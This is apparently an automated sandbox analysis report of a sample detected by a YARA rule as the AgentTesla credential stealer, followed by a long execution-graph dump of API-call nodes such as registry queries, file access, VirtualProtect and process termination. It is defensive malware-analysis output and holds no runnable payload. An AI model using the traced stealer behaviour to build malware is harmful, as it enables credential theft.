                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.4495084882.000000000302E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:high
                                  Has exited:false

                                  Disassembly

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:3.7%
                                    Dynamic/Decrypted Code Coverage:0.4%
                                    Signature Coverage:5.3%
                                    Total number of Nodes:2000
                                    Total number of Limit Nodes:50
                                    execution_graph 94024 9fb31e GetTempPathW 94025 9fb33b 94024->94025 94026 caa208 94040 ca7e08 94026->94040 94028 caa2c3 94043 caa0f8 94028->94043 94046 cab308 GetPEB 94040->94046 94042 ca8493 94042->94028 94044 caa101 Sleep 94043->94044 94045 caa10f 94044->94045 94047 cab332 94046->94047 94047->94042 94048 9f19dd 94053 984a30 94048->94053 94050 9f19f1 94073 9a0f0a 52 API calls __cinit 94050->94073 94052 9f19fb 94054 984a40 __ftell_nolock 94053->94054 94074 98d7f7 94054->94074 94058 984aff 94086 98363c 94058->94086 94065 98d7f7 48 API calls 94066 984b32 94065->94066 94108 9849fb 94066->94108 94068 984b43 Mailbox 94068->94050 94069 9861a6 48 API calls 94072 984b3d _wcscat Mailbox __wsetenvp 94069->94072 94071 9864cf 48 API calls 94071->94072 94072->94068 94072->94069 94072->94071 94122 98ce19 94072->94122 94073->94052 94128 99f4ea 94074->94128 94076 98d818 94077 99f4ea 48 API calls 94076->94077 94078 984af6 94077->94078 94079 985374 94078->94079 94159 9af8a0 94079->94159 94082 98ce19 48 API calls 94083 9853a7 94082->94083 94161 98660f 94083->94161 94085 9853b1 Mailbox 94085->94058 94087 983649 __ftell_nolock 94086->94087 94208 98366c GetFullPathNameW 94087->94208 94089 98365a 94090 986a63 48 API calls 94089->94090 94091 983669 94090->94091 94092 98518c 94091->94092 94093 985197 94092->94093 94094 9f1ace 94093->94094 94095 98519f 94093->94095 94097 986b4a 48 API calls 94094->94097 94210 985130 94095->94210 94099 9f1adb __wsetenvp 94097->94099 94098 984b18 94102 9864cf 94098->94102 94100 99ee75 48 API calls 94099->94100 94101 9f1b07 ___crtGetEnvironmentStringsW 94100->94101 94103 98651b 94102->94103 94107 9864dd ___crtGetEnvironmentStringsW 94102->94107 94105 99f4ea 48 API calls 94103->94105 94104 99f4ea 48 API calls 94106 984b29 94104->94106 94105->94107 94106->94065 94107->94104 94225 98bcce 94108->94225 94111 9f41cc RegQueryValueExW 94113 9f4246 RegCloseKey 94111->94113 94114 9f41e5 94111->94114 94112 984a2b 94112->94072 94115 99f4ea 48 API calls 94114->94115 94116 9f41fe 94115->94116 94231 9847b7 94116->94231 94119 9f423b 94119->94113 94120 9f4224 94121 986a63 48 API calls 94120->94121 94121->94119 94123 98ce28 __wsetenvp 94122->94123 94124 99ee75 48 API calls 94123->94124 94125 98ce50 ___crtGetEnvironmentStringsW 94124->94125 94126 99f4ea 48 API calls 94125->94126 94127 98ce66 94126->94127 94127->94072 94131 99f4f2 __calloc_impl 94128->94131 94130 99f50c 94130->94076 94131->94130 94132 99f50e std::exception::exception 94131->94132 94137 9a395c 94131->94137 94151 9a6805 RaiseException 94132->94151 94134 99f538 94152 9a673b 47 API calls _free 94134->94152 94136 99f54a 94136->94076 94138 9a39d7 __calloc_impl 94137->94138 94146 9a3968 __calloc_impl 94137->94146 94158 9a7c0e 47 API calls __getptd_noexit 94138->94158 94141 9a399b RtlAllocateHeap 94142 9a39cf 94141->94142 94141->94146 94142->94131 94144 9a3973 94144->94146 94153 9a81c2 47 API calls 2 library calls 94144->94153 94154 9a821f 47 API calls 8 library calls 94144->94154 94155 9a1145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 94144->94155 94145 9a39c3 94156 9a7c0e 47 API calls __getptd_noexit 94145->94156 94146->94141 94146->94144 94146->94145 94149 9a39c1 94146->94149 94157 9a7c0e 47 API calls __getptd_noexit 94149->94157 94151->94134 94152->94136 94153->94144 94154->94144 94156->94149 94157->94142 94158->94142 94160 985381 GetModuleFileNameW 94159->94160 94160->94082 94162 9af8a0 __ftell_nolock 94161->94162 94163 98661c GetFullPathNameW 94162->94163 94168 986a63 94163->94168 94165 986643 94179 986571 94165->94179 94169 986adf 94168->94169 94171 986a6f __wsetenvp 94168->94171 94196 98b18b 94169->94196 94172 986a8b 94171->94172 94173 986ad7 94171->94173 94183 986b4a 94172->94183 94195 98c369 48 API calls 94173->94195 94176 986ab6 ___crtGetEnvironmentStringsW 94176->94165 94177 986a95 94186 99ee75 94177->94186 94180 98657f 94179->94180 94181 98b18b 48 API calls 94180->94181 94182 98658f 94181->94182 94182->94085 94184 99f4ea 48 API calls 94183->94184 94185 986b54 94184->94185 94185->94177 94188 99f4ea __calloc_impl 94186->94188 94187 9a395c __crtGetStringTypeA_stat 47 API calls 94187->94188 94188->94187 94189 99f50c 94188->94189 94190 99f50e std::exception::exception 94188->94190 94189->94176 94200 9a6805 RaiseException 94190->94200 94192 99f538 94201 9a673b 47 API calls _free 94192->94201 94194 99f54a 94194->94176 94195->94176 94197 98b199 94196->94197 94199 98b1a2 ___crtGetEnvironmentStringsW 94196->94199 94197->94199 94202 98bdfa 94197->94202 94199->94176 94200->94192 94201->94194 94203 98be0d 94202->94203 94207 98be0a ___crtGetEnvironmentStringsW 94202->94207 94204 99f4ea 48 API calls 94203->94204 94205 98be17 94204->94205 94206 99ee75 48 API calls 94205->94206 94206->94207 94207->94199 94209 98368a 94208->94209 94209->94089 94211 98513f __wsetenvp 94210->94211 94212 9f1b27 94211->94212 94213 985151 94211->94213 94214 986b4a 48 API calls 94212->94214 94220 98bb85 94213->94220 94216 9f1b34 94214->94216 94218 99ee75 48 API calls 94216->94218 94217 98515e ___crtGetEnvironmentStringsW 94217->94098 94219 9f1b57 ___crtGetEnvironmentStringsW 94218->94219 94221 98bb9b 94220->94221 94224 98bb96 ___crtGetEnvironmentStringsW 94220->94224 94222 99ee75 48 API calls 94221->94222 94223 9f1b77 94221->94223 94222->94224 94224->94217 94226 98bce8 94225->94226 94230 984a0a RegOpenKeyExW 94225->94230 94227 99f4ea 48 API calls 94226->94227 94228 98bcf2 94227->94228 94229 99ee75 48 API calls 94228->94229 94229->94230 94230->94111 94230->94112 94232 99f4ea 48 API calls 94231->94232 94233 9847c9 RegQueryValueExW 94232->94233 94233->94119 94233->94120 94234 9f9bec 94269 990ae0 Mailbox ___crtGetEnvironmentStringsW 94234->94269 94238 99146e 94248 986eed 48 API calls 94238->94248 94241 990509 94482 9ccc5c 86 API calls 4 library calls 94241->94482 94242 986eed 48 API calls 94260 98fec8 94242->94260 94243 99f4ea 48 API calls 94243->94260 94245 991473 94481 9ccc5c 86 API calls 4 library calls 94245->94481 94246 9fa246 94473 986eed 94246->94473 94263 98ffe1 Mailbox 94248->94263 94249 9fa922 94253 9fa873 94254 9b97ed InterlockedDecrement 94254->94260 94255 98d7f7 48 API calls 94255->94260 94256 9fa30e 94256->94263 94477 9b97ed InterlockedDecrement 94256->94477 94257 98ce19 48 API calls 94257->94269 94258 9a0f0a 52 API calls __cinit 94258->94260 94260->94238 94260->94241 94260->94242 94260->94243 94260->94245 94260->94246 94260->94254 94260->94255 94260->94256 94260->94258 94261 9fa973 94260->94261 94260->94263 94265 9915b5 94260->94265 94470 991820 335 API calls 2 library calls 94260->94470 94471 991d10 59 API calls Mailbox 94260->94471 94483 9ccc5c 86 API calls 4 library calls 94261->94483 94264 9fa982 94480 9ccc5c 86 API calls 4 library calls 94265->94480 94267 99f4ea 48 API calls 94267->94269 94269->94257 94269->94260 94269->94263 94269->94267 94270 9fa706 94269->94270 94272 991526 Mailbox 94269->94272 94273 9b97ed InterlockedDecrement 94269->94273 94278 98fe30 94269->94278 94307 9e0d09 94269->94307 94310 982db5 94269->94310 94350 982a13 94269->94350 94353 9cfe7e 94269->94353 94392 9df0ac 94269->94392 94424 9ca6ef 94269->94424 94430 9de822 94269->94430 94472 9def61 82 API calls 2 library calls 94269->94472 94478 9ccc5c 86 API calls 4 library calls 94270->94478 94479 9ccc5c 86 API calls 4 library calls 94272->94479 94273->94269 94279 98fe50 94278->94279 94289 98fe7e 94278->94289 94280 99f4ea 48 API calls 94279->94280 94280->94289 94281 99146e 94282 986eed 48 API calls 94281->94282 94292 98ffe1 94282->94292 94283 9b97ed InterlockedDecrement 94283->94289 94284 98d7f7 48 API calls 94284->94289 94287 990509 94489 9ccc5c 86 API calls 4 library calls 94287->94489 94288 986eed 48 API calls 94288->94289 94289->94281 94289->94283 94289->94284 94289->94287 94289->94288 94290 99f4ea 48 API calls 94289->94290 94289->94292 94293 9fa246 94289->94293 94294 991473 94289->94294 94300 9a0f0a 52 API calls __cinit 94289->94300 94301 9fa30e 94289->94301 94303 9fa973 94289->94303 94306 9915b5 94289->94306 94484 991820 335 API calls 2 library calls 94289->94484 94485 991d10 59 API calls Mailbox 94289->94485 94290->94289 94292->94269 94296 986eed 48 API calls 94293->94296 94488 9ccc5c 86 API calls 4 library calls 94294->94488 94295 9fa922 94295->94269 94296->94292 94299 9fa873 94299->94269 94300->94289 94301->94292 94486 9b97ed InterlockedDecrement 94301->94486 94490 9ccc5c 86 API calls 4 library calls 94303->94490 94305 9fa982 94487 9ccc5c 86 API calls 4 library calls 94306->94487 94491 9df8ae 94307->94491 94309 9e0d19 94309->94269 94630 98cdb9 94310->94630 94312 9f5f6d 94327 982e22 94312->94327 94686 9d2113 48 API calls 94312->94686 94313 982dcd 94313->94312 94315 99f4ea 48 API calls 94313->94315 94316 982ded 94315->94316 94317 982dfd 94316->94317 94667 9848ba 49 API calls 94316->94667 94319 98936c 81 API calls 94317->94319 94320 982e0b 94319->94320 94668 984550 94320->94668 94323 9f5fb9 94324 982e31 94323->94324 94325 9f5fc1 94323->94325 94329 982a13 2 API calls 94324->94329 94688 98d286 48 API calls 94325->94688 94327->94324 94687 98d286 48 API calls 94327->94687 94330 982e38 94329->94330 94332 9f5fd4 94330->94332 94333 982e45 94330->94333 94334 99f4ea 48 API calls 94332->94334 94335 98d7f7 48 API calls 94333->94335 94336 9f5fda 94334->94336 94337 982e4d 94335->94337 94338 9f5ff3 94336->94338 94689 99eb66 SetFilePointerEx ReadFile 94336->94689 94644 99e52c 94337->94644 94344 9f5ff7 ___crtGetEnvironmentStringsW 94338->94344 94690 9ca3e3 48 API calls _memset 94338->94690 94342 982e5c 94342->94344 94679 986b68 48 API calls 94342->94679 94345 982e70 Mailbox 94346 982eb0 94345->94346 94680 984907 94345->94680 94346->94269 94351 9835fe 2 API calls 94350->94351 94352 982a1b 94351->94352 94352->94269 94354 9cfe9c 94353->94354 94355 9cfea7 94353->94355 94799 98d286 48 API calls 94354->94799 94358 98936c 81 API calls 94355->94358 94381 9cff3a Mailbox 94355->94381 94357 99f4ea 48 API calls 94359 9cff5f 94357->94359 94360 9cfeca 94358->94360 94361 9cff6b 94359->94361 94806 9848ba 49 API calls 94359->94806 94800 9a1dfc 94360->94800 94364 98936c 81 API calls 94361->94364 94366 9cff83 94364->94366 94368 984550 56 API calls 94366->94368 94367 98ce19 48 API calls 94369 9cfef3 94367->94369 94370 9cff92 94368->94370 94371 98518c 48 API calls 94369->94371 94372 9cffca 94370->94372 94373 9cff96 GetLastError 94370->94373 94374 9cff01 94371->94374 94378 9cfff5 94372->94378 94379 9d0011 94372->94379 94375 9cffaf 94373->94375 94376 9cff33 94374->94376 94803 9c6514 GetFileAttributesW FindFirstFileW FindClose 94374->94803 94390 9cff43 Mailbox 94375->94390 94807 98453b CloseHandle 94375->94807 94805 98d286 48 API calls 94376->94805 94382 99f4ea 48 API calls 94378->94382 94383 99f4ea 48 API calls 94379->94383 94381->94357 94381->94390 94385 9cfffa 94382->94385 94383->94390 94384 9cff11 94384->94376 94387 9cff15 94384->94387 94808 9e29e8 48 API calls ___crtGetEnvironmentStringsW 94385->94808 94804 9c6318 52 API calls 3 library calls 94387->94804 94390->94269 94391 9cff1e 94391->94376 94393 98d7f7 48 API calls 94392->94393 94394 9df0c0 94393->94394 94395 98d7f7 48 API calls 94394->94395 94396 9df0c8 94395->94396 94397 98d7f7 48 API calls 94396->94397 94398 9df0d0 94397->94398 94399 98936c 81 API calls 94398->94399 94410 9df0de 94399->94410 94400 98c799 48 API calls 94400->94410 94401 986a63 48 API calls 94401->94410 94402 9df2f9 Mailbox 94402->94269 94404 9df2b3 94406 98518c 48 API calls 94404->94406 94405 986eed 48 API calls 94405->94410 94408 9df2c0 94406->94408 94407 9df2ce 94409 98518c 48 API calls 94407->94409 94857 98510d 48 API calls Mailbox 94408->94857 94413 9df2dd 94409->94413 94410->94400 94410->94401 94410->94402 94410->94404 94410->94405 94410->94407 94411 98bdfa 48 API calls 94410->94411 94414 98bdfa 48 API calls 94410->94414 94416 9df2cc 94410->94416 94421 98936c 81 API calls 94410->94421 94422 98510d 48 API calls 94410->94422 94423 98518c 48 API calls 94410->94423 94415 9df175 CharUpperBuffW 94411->94415 94858 98510d 48 API calls Mailbox 94413->94858 94418 9df23a CharUpperBuffW 94414->94418 94835 98d645 94415->94835 94416->94402 94859 986b68 48 API calls 94416->94859 94845 99d922 94418->94845 94421->94410 94422->94410 94423->94410 94425 9ca6fb 94424->94425 94426 99f4ea 48 API calls 94425->94426 94427 9ca709 94426->94427 94428 9ca717 94427->94428 94429 98d7f7 48 API calls 94427->94429 94428->94269 94429->94428 94431 9de84e 94430->94431 94432 9de868 94430->94432 94870 9ccc5c 86 API calls 4 library calls 94431->94870 94871 9dccdc 48 API calls 94432->94871 94435 9de871 94436 98fe30 334 API calls 94435->94436 94437 9de8cf 94436->94437 94438 9de96a 94437->94438 94440 9de916 94437->94440 94469 9de860 Mailbox 94437->94469 94439 9de978 94438->94439 94442 9de9c7 94438->94442 94890 9ca69d 48 API calls 94439->94890 94872 9c9b72 48 API calls 94440->94872 94445 98936c 81 API calls 94442->94445 94442->94469 94444 9de949 94873 9945e0 94444->94873 94448 9de9e1 94445->94448 94446 9de99b 94891 98bc74 48 API calls 94446->94891 94450 98bdfa 48 API calls 94448->94450 94452 9dea05 CharUpperBuffW 94450->94452 94451 9de9a3 Mailbox 94892 993200 335 API calls 2 library calls 94451->94892 94453 9dea1f 94452->94453 94455 9dea26 94453->94455 94456 9dea72 94453->94456 94893 9c9b72 48 API calls 94455->94893 94457 98936c 81 API calls 94456->94457 94458 9dea7a 94457->94458 94894 981caa 49 API calls 94458->94894 94461 9dea54 94462 9945e0 334 API calls 94461->94462 94462->94469 94463 9dea84 94464 98936c 81 API calls 94463->94464 94463->94469 94465 9dea9f 94464->94465 94895 98bc74 48 API calls 94465->94895 94467 9deaaf 94896 993200 335 API calls 2 library calls 94467->94896 94469->94269 94470->94260 94471->94260 94472->94269 94474 986ef8 94473->94474 94475 986f00 94473->94475 96021 98dd47 48 API calls ___crtGetEnvironmentStringsW 94474->96021 94475->94263 94477->94263 94478->94272 94479->94263 94480->94263 94481->94253 94482->94249 94483->94264 94484->94289 94485->94289 94486->94292 94487->94292 94488->94299 94489->94295 94490->94305 94527 98936c 94491->94527 94493 9df8ea 94497 9df92c Mailbox 94493->94497 94547 9e0567 94493->94547 94495 9dfb8b 94496 9dfcfa 94495->94496 94502 9dfb95 94495->94502 94610 9e0688 89 API calls Mailbox 94496->94610 94497->94309 94500 9dfd07 94500->94502 94503 9dfd13 94500->94503 94501 9df984 Mailbox 94501->94495 94501->94497 94504 98936c 81 API calls 94501->94504 94578 9e29e8 48 API calls ___crtGetEnvironmentStringsW 94501->94578 94579 9dfda5 60 API calls 2 library calls 94501->94579 94560 9df70a 94502->94560 94503->94497 94504->94501 94509 9dfbc9 94574 99ed18 94509->94574 94512 9dfbfd 94581 99c050 94512->94581 94513 9dfbe3 94580 9ccc5c 86 API calls 4 library calls 94513->94580 94516 9dfbee GetCurrentProcess TerminateProcess 94516->94512 94517 9dfc14 94526 9dfc3e 94517->94526 94592 991b90 94517->94592 94519 9dfd65 94519->94497 94523 9dfd7e FreeLibrary 94519->94523 94520 9dfc2d 94608 9e040f 105 API calls _free 94520->94608 94522 991b90 48 API calls 94522->94526 94523->94497 94526->94519 94526->94522 94609 98dcae 50 API calls Mailbox 94526->94609 94611 9e040f 105 API calls _free 94526->94611 94528 989384 94527->94528 94545 989380 94527->94545 94529 9f4bbf 94528->94529 94530 989398 94528->94530 94533 9f4cbd __i64tow 94528->94533 94540 9893b0 __itow Mailbox _wcscpy 94528->94540 94531 9f4ca5 94529->94531 94535 9f4bc8 94529->94535 94612 9a172b 80 API calls 3 library calls 94530->94612 94613 9a172b 80 API calls 3 library calls 94531->94613 94533->94533 94538 9f4be7 94535->94538 94535->94540 94536 99f4ea 48 API calls 94537 9893ba 94536->94537 94541 98ce19 48 API calls 94537->94541 94537->94545 94539 99f4ea 48 API calls 94538->94539 94543 9f4c04 94539->94543 94540->94536 94541->94545 94542 99f4ea 48 API calls 94544 9f4c2a 94542->94544 94543->94542 94544->94545 94546 98ce19 48 API calls 94544->94546 94545->94493 94546->94545 94548 98bdfa 48 API calls 94547->94548 94549 9e0582 CharLowerBuffW 94548->94549 94614 9c1f11 94549->94614 94553 98d7f7 48 API calls 94554 9e05bb 94553->94554 94621 9869e9 48 API calls ___crtGetEnvironmentStringsW 94554->94621 94556 9e061a Mailbox 94556->94501 94557 9e05d2 94558 98b18b 48 API calls 94557->94558 94559 9e05de Mailbox 94558->94559 94559->94556 94622 9dfda5 60 API calls 2 library calls 94559->94622 94561 9df77a 94560->94561 94562 9df725 94560->94562 94566 9e0828 94561->94566 94563 99f4ea 48 API calls 94562->94563 94565 9df747 94563->94565 94564 99f4ea 48 API calls 94564->94565 94565->94561 94565->94564 94567 9e0a53 Mailbox 94566->94567 94573 9e084b _strcat _wcscpy __wsetenvp 94566->94573 94567->94509 94568 98cf93 58 API calls 94568->94573 94569 98d286 48 API calls 94569->94573 94570 98936c 81 API calls 94570->94573 94571 9a395c 47 API calls __crtGetStringTypeA_stat 94571->94573 94573->94567 94573->94568 94573->94569 94573->94570 94573->94571 94625 9c8035 50 API calls __wsetenvp 94573->94625 94575 99ed2d 94574->94575 94576 99edc5 VirtualProtect 94575->94576 94577 99ed93 94575->94577 94576->94577 94577->94512 94577->94513 94578->94501 94579->94501 94580->94516 94582 99c064 94581->94582 94584 99c069 Mailbox 94581->94584 94626 99c1af 48 API calls 94582->94626 94589 99c077 94584->94589 94627 99c15c 48 API calls 94584->94627 94586 99f4ea 48 API calls 94588 99c108 94586->94588 94587 99c152 94587->94517 94590 99f4ea 48 API calls 94588->94590 94589->94586 94589->94587 94591 99c113 94590->94591 94591->94517 94591->94591 94593 991cf6 94592->94593 94596 991ba2 94592->94596 94593->94520 94594 991bae 94599 991bb9 94594->94599 94629 99c15c 48 API calls 94594->94629 94596->94594 94597 99f4ea 48 API calls 94596->94597 94598 9f49c4 94597->94598 94600 99f4ea 48 API calls 94598->94600 94601 991c5d 94599->94601 94602 99f4ea 48 API calls 94599->94602 94607 9f49cf 94600->94607 94601->94520 94603 991c9f 94602->94603 94604 991cb2 94603->94604 94628 982925 48 API calls 94603->94628 94604->94520 94606 99f4ea 48 API calls 94606->94607 94607->94594 94607->94606 94608->94526 94609->94526 94610->94500 94611->94526 94612->94540 94613->94540 94616 9c1f3b __wsetenvp 94614->94616 94615 9c1f79 94615->94553 94615->94559 94616->94615 94617 9c1ffa 94616->94617 94618 9c1f6f 94616->94618 94617->94615 94624 99d37a 60 API calls 94617->94624 94618->94615 94623 99d37a 60 API calls 94618->94623 94621->94557 94622->94556 94623->94618 94624->94617 94625->94573 94626->94584 94627->94589 94628->94604 94629->94599 94631 98cdfb 94630->94631 94632 98cdc5 94630->94632 94633 98ce0e 94631->94633 94634 98ce04 94631->94634 94637 99f4ea 48 API calls 94632->94637 94636 98bcce 48 API calls 94633->94636 94635 986a63 48 API calls 94634->94635 94641 98cdf1 94635->94641 94636->94641 94638 98cdd8 94637->94638 94639 98cde3 94638->94639 94640 9f4621 94638->94640 94639->94641 94643 98ce19 48 API calls 94639->94643 94640->94641 94642 98d7f7 48 API calls 94640->94642 94641->94313 94642->94641 94643->94641 94645 99e535 94644->94645 94646 99e547 94644->94646 94647 99e53b 94645->94647 94648 99e541 94645->94648 94649 98bcce 48 API calls 94646->94649 94691 99e63a 94647->94691 94650 99e63a 48 API calls 94648->94650 94660 9c5a81 94649->94660 94652 9c5c17 94650->94652 94655 98bf20 50 API calls 94652->94655 94653 9c5ab0 94653->94342 94659 9c5c25 94655->94659 94666 9c5c35 Mailbox 94659->94666 94712 9c5cf1 50 API calls 94659->94712 94660->94653 94710 9c5a27 SetFilePointerEx ReadFile 94660->94710 94711 98c799 48 API calls ___crtGetEnvironmentStringsW 94660->94711 94661 9f40c9 94665 99e581 Mailbox 94665->94342 94666->94342 94667->94317 94669 984907 CloseHandle 94668->94669 94670 98455b 94669->94670 94754 9847ff 94670->94754 94674 98458d 94782 9845be SetFilePointerEx SetFilePointerEx 94674->94782 94676 984594 94783 984845 SetFilePointerEx SetFilePointerEx WriteFile 94676->94783 94678 982e1a 94678->94312 94678->94327 94685 98453b CloseHandle 94678->94685 94679->94345 94681 984920 94680->94681 94682 982ea2 94680->94682 94681->94682 94683 984925 CloseHandle 94681->94683 94684 98453b CloseHandle 94682->94684 94683->94682 94684->94346 94685->94312 94686->94312 94687->94323 94688->94330 94689->94338 94690->94344 94692 99f4ea 48 API calls 94691->94692 94693 99e64d 94692->94693 94694 986b4a 48 API calls 94693->94694 94695 99e55f 94694->94695 94696 98bf20 94695->94696 94713 98c1c2 94696->94713 94698 98bf31 94700 98bf66 94698->94700 94720 98c2e0 94698->94720 94726 98bf71 94698->94726 94700->94661 94702 98c1de MultiByteToWideChar 94700->94702 94703 98c201 94702->94703 94704 98c245 94702->94704 94705 99f4ea 48 API calls 94703->94705 94706 98bcce 48 API calls 94704->94706 94707 98c216 MultiByteToWideChar 94705->94707 94709 98c237 94706->94709 94741 98c24f 94707->94741 94709->94665 94710->94660 94711->94660 94712->94666 94714 9f3e49 94713->94714 94715 98c1d3 94713->94715 94716 986b4a 48 API calls 94714->94716 94715->94698 94717 9f3e53 94716->94717 94718 99f4ea 48 API calls 94717->94718 94719 9f3e5f 94718->94719 94721 98c354 94720->94721 94724 98c2ee 94720->94724 94735 9845a6 SetFilePointerEx 94721->94735 94723 98c317 94723->94698 94724->94723 94725 98c327 ReadFile 94724->94725 94725->94723 94725->94724 94727 9f3d35 94726->94727 94728 98bf85 94726->94728 94729 986b4a 48 API calls 94727->94729 94736 98c3b9 94728->94736 94731 9f3d40 94729->94731 94733 99f4ea 48 API calls 94731->94733 94732 98bf91 94732->94698 94734 9f3d55 ___crtGetEnvironmentStringsW 94733->94734 94735->94724 94737 98c3cf 94736->94737 94740 98c3ca ___crtGetEnvironmentStringsW 94736->94740 94738 9f3e67 94737->94738 94739 99f4ea 48 API calls 94737->94739 94739->94740 94740->94732 94742 98c25e 94741->94742 94743 98c2d1 94741->94743 94742->94743 94745 98c26a 94742->94745 94744 98b18b 48 API calls 94743->94744 94746 98c27c ___crtGetEnvironmentStringsW 94744->94746 94747 98c2a2 94745->94747 94748 98c274 94745->94748 94746->94709 94749 986b4a 48 API calls 94747->94749 94753 98c369 48 API calls 94748->94753 94751 98c2ac 94749->94751 94752 99f4ea 48 API calls 94751->94752 94752->94746 94753->94746 94755 984818 CreateFileW 94754->94755 94756 9f406e 94754->94756 94758 984582 94755->94758 94757 9f4074 CreateFileW 94756->94757 94756->94758 94757->94758 94759 9f409a 94757->94759 94758->94678 94762 9845d5 94758->94762 94784 9846ce 94759->94784 94764 9845f5 94762->94764 94763 9846a2 94763->94674 94764->94763 94765 9846ce 2 API calls 94764->94765 94773 98464e 94764->94773 94766 98462d 94765->94766 94767 99f4ea 48 API calls 94766->94767 94768 984638 94767->94768 94769 9847b7 48 API calls 94768->94769 94771 984642 94769->94771 94770 9846ce 2 API calls 94770->94763 94772 98c2e0 2 API calls 94771->94772 94772->94773 94774 9846ce 2 API calls 94773->94774 94781 984689 94773->94781 94775 9f3e0a 94774->94775 94794 9835fe 94775->94794 94778 99f4ea 48 API calls 94779 9f3e19 94778->94779 94780 98c2e0 2 API calls 94779->94780 94780->94781 94781->94770 94782->94676 94783->94678 94791 9846e8 94784->94791 94785 98476d SetFilePointerEx 94792 984798 SetFilePointerEx 94785->94792 94786 9f40d0 94793 984798 SetFilePointerEx 94786->94793 94789 9f40ea 94790 984743 94790->94758 94791->94785 94791->94786 94791->94790 94792->94790 94793->94789 94795 9846ce 2 API calls 94794->94795 94796 98361f 94795->94796 94797 9846ce 2 API calls 94796->94797 94798 983633 94797->94798 94798->94778 94799->94355 94809 9a1e46 94800->94809 94803->94384 94804->94391 94805->94381 94806->94361 94807->94390 94808->94390 94810 9a1e55 94809->94810 94811 9a1e61 94809->94811 94810->94811 94823 9a1ed4 94810->94823 94828 9a9d6b 47 API calls __strnicmp_l 94810->94828 94833 9a7c0e 47 API calls __getptd_noexit 94811->94833 94813 9a2019 94817 9a1e41 94813->94817 94834 9a6e10 8 API calls __strnicmp_l 94813->94834 94816 9a1fa0 94816->94811 94816->94817 94819 9a1fb0 94816->94819 94817->94367 94818 9a1f5f 94818->94811 94820 9a1f7b 94818->94820 94830 9a9d6b 47 API calls __strnicmp_l 94818->94830 94832 9a9d6b 47 API calls __strnicmp_l 94819->94832 94820->94811 94820->94817 94822 9a1f91 94820->94822 94831 9a9d6b 47 API calls __strnicmp_l 94822->94831 94823->94811 94827 9a1f41 94823->94827 94829 9a9d6b 47 API calls __strnicmp_l 94823->94829 94827->94816 94827->94818 94828->94823 94829->94827 94830->94820 94831->94817 94832->94817 94833->94813 94834->94817 94836 98d654 94835->94836 94843 98d67e 94835->94843 94837 98d65b 94836->94837 94839 98d6c2 94836->94839 94838 98d666 94837->94838 94844 98d6ab 94837->94844 94860 98d9a0 53 API calls __cinit 94838->94860 94839->94844 94862 99dce0 53 API calls 94839->94862 94843->94410 94844->94843 94861 99dce0 53 API calls 94844->94861 94863 986b0f 94845->94863 94847 99d947 _wcscmp 94848 9fabcf 94847->94848 94849 98ce19 48 API calls 94847->94849 94851 99d975 Mailbox 94847->94851 94868 98510d 48 API calls Mailbox 94848->94868 94849->94848 94851->94410 94852 9fabdd 94853 98d645 53 API calls 94852->94853 94854 9fabef 94853->94854 94856 9fabf4 Mailbox 94854->94856 94869 98dcae 50 API calls Mailbox 94854->94869 94856->94410 94857->94416 94858->94416 94859->94402 94860->94843 94861->94843 94862->94844 94864 99f4ea 48 API calls 94863->94864 94865 986b34 94864->94865 94866 986b4a 48 API calls 94865->94866 94867 986b43 94866->94867 94867->94847 94868->94852 94869->94856 94870->94469 94871->94435 94872->94444 94874 99479f 94873->94874 94875 994637 94873->94875 94878 98ce19 48 API calls 94874->94878 94876 9f6e05 94875->94876 94877 994643 94875->94877 94879 9de822 335 API calls 94876->94879 94897 994300 94877->94897 94885 9946e4 Mailbox 94878->94885 94881 9f6e11 94879->94881 94882 994739 Mailbox 94881->94882 94971 9ccc5c 86 API calls 4 library calls 94881->94971 94882->94469 94884 994659 94884->94881 94884->94882 94884->94885 94912 9cfa0c 94885->94912 94953 9d6ff0 94885->94953 94962 984252 94885->94962 94968 9c6524 94885->94968 94890->94446 94891->94451 94892->94469 94893->94461 94894->94463 94895->94467 94896->94469 94898 9f6e60 94897->94898 94901 99432c 94897->94901 94973 9ccc5c 86 API calls 4 library calls 94898->94973 94900 9f6e71 94974 9ccc5c 86 API calls 4 library calls 94900->94974 94901->94900 94907 994366 ___crtGetEnvironmentStringsW 94901->94907 94903 994445 94903->94884 94905 99f4ea 48 API calls 94905->94907 94906 9944b1 94906->94884 94907->94903 94907->94905 94908 98fe30 335 API calls 94907->94908 94909 9f6ebd 94907->94909 94911 994435 94907->94911 94908->94907 94975 9ccc5c 86 API calls 4 library calls 94909->94975 94911->94903 94972 9dcda2 82 API calls Mailbox 94911->94972 94913 9cfa1c __ftell_nolock 94912->94913 94914 9cfa44 94913->94914 95061 98d286 48 API calls 94913->95061 94916 98936c 81 API calls 94914->94916 94917 9cfa5e 94916->94917 94918 9cfb68 94917->94918 94919 9cfa80 94917->94919 94930 9cfb92 94917->94930 94976 9841a9 94918->94976 94921 98936c 81 API calls 94919->94921 94927 9cfa8c _wcscpy _wcschr 94921->94927 94923 9cfb8e 94925 98936c 81 API calls 94923->94925 94923->94930 94924 9841a9 136 API calls 94924->94923 94926 9cfbc7 94925->94926 94928 9a1dfc __wsplitpath 47 API calls 94926->94928 94932 9cfab0 _wcscat _wcscpy 94927->94932 94936 9cfade _wcscat 94927->94936 94937 9cfbeb _wcscat _wcscpy 94928->94937 94929 98936c 81 API calls 94931 9cfafc _wcscpy 94929->94931 94930->94882 95062 9c72cb GetFileAttributesW 94931->95062 94934 98936c 81 API calls 94932->94934 94934->94936 94935 9cfb1c __wsetenvp 94935->94930 94938 98936c 81 API calls 94935->94938 94936->94929 94941 98936c 81 API calls 94937->94941 94939 9cfb48 94938->94939 95063 9c60dd 77 API calls 4 library calls 94939->95063 94943 9cfc82 94941->94943 94942 9cfb5c 94942->94930 95000 9c690b 94943->95000 94945 9cfca2 94946 9c6524 3 API calls 94945->94946 94947 9cfcb1 94946->94947 94948 98936c 81 API calls 94947->94948 94951 9cfce2 94947->94951 94949 9cfccb 94948->94949 95006 9cbfa4 94949->95006 94952 984252 84 API calls 94951->94952 94952->94930 94954 98936c 81 API calls 94953->94954 94955 9d702a 94954->94955 95980 98b470 94955->95980 94957 9d703a 94958 9d705f 94957->94958 94959 98fe30 335 API calls 94957->94959 94960 98cdb9 48 API calls 94958->94960 94961 9d7063 94958->94961 94959->94958 94960->94961 94961->94882 94963 98425c 94962->94963 94967 984263 94962->94967 94964 9a35e4 